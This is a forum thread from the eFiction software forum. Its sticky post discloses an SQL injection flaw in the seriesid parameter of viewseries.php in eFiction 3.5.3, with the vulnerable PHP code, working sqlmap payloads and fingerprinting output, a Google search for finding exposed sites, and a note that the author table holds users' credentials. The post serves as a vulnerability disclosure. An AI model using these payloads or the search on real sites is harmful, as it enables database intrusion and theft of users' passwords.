[Sticky] SQL Injection vulnerability in eFiction

Guest · 2014-11-13T00:46:24Z

Hello ...The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.The page loads the URL parameter "seriesid": $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;Then it passes the *tainted* value directly down to the database: $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i, ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");This allows an attacker to extract information from the underlying database. sqlmap identified the following injection points with a total of 396 HTTP(s) requests: --- Place: GET Parameter: seriesid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL --- [20:37:41] [INFO] testing MySQL [20:37:42] [INFO] confirming MySQL [20:37:45] [INFO] the back-end DBMS is MySQL [20:37:45] [INFO] fetching banner [20:37:45] [INFO] retrieving the length of query output [20:37:45] [INFO] retrieved: 20 [20:38:25] [INFO] retrieved: 5.1.69-community-log [20:38:25] [INFO] actively fingerprinting MySQL [20:38:28] [INFO] executing MySQL comment injection fingerprint web application technology: Apache, PHP 5.2.17 back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0 banner parsing fingerprint: MySQL 5.1.69, logging enabled banner: '5.1.69-community-log'Vulnerable sites can be found using Google by executing this search: inurl:"viewseries.php?seriesid="The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public. ... Robert

Page 2 / 2 Prev

eFiction Software News

Last Post by cristodulo 5 years ago

17 Posts

12 Users

0 Reactions

18.5 K Views

RSS

jacci

(@jacci)

Posts: 502

Honorable Member

I am very willing too to help with beta testing, anything you need

why is nothing ever easy?
url: http://www.pretendercentre.com/missingpieces/
php: 5.2.5 msql: 5.0.45-community
efic version: 3.4.3 latest patches: yes
bridges: none mods: challenges, displayword, beta-search

Posted : 15/11/2014 5:32 pm

cristodulo

(@cristodulo)

Posts: 1

New Member

nice pice of history

Posted : 09/06/2021 6:18 am

Page 2 / 2 Prev

32 Forums
3,661 Topics
20 K Posts
5 Online
4,464 Members

Forum Icons: Forum contains no unread posts Forum contains unread posts

Topic Icons: Not Replied Replied Active Hot Sticky Unapproved Solved Private Closed

Become a Patron!

[Sticky] SQL Injection vulnerability in eFiction

Share this:

Like this: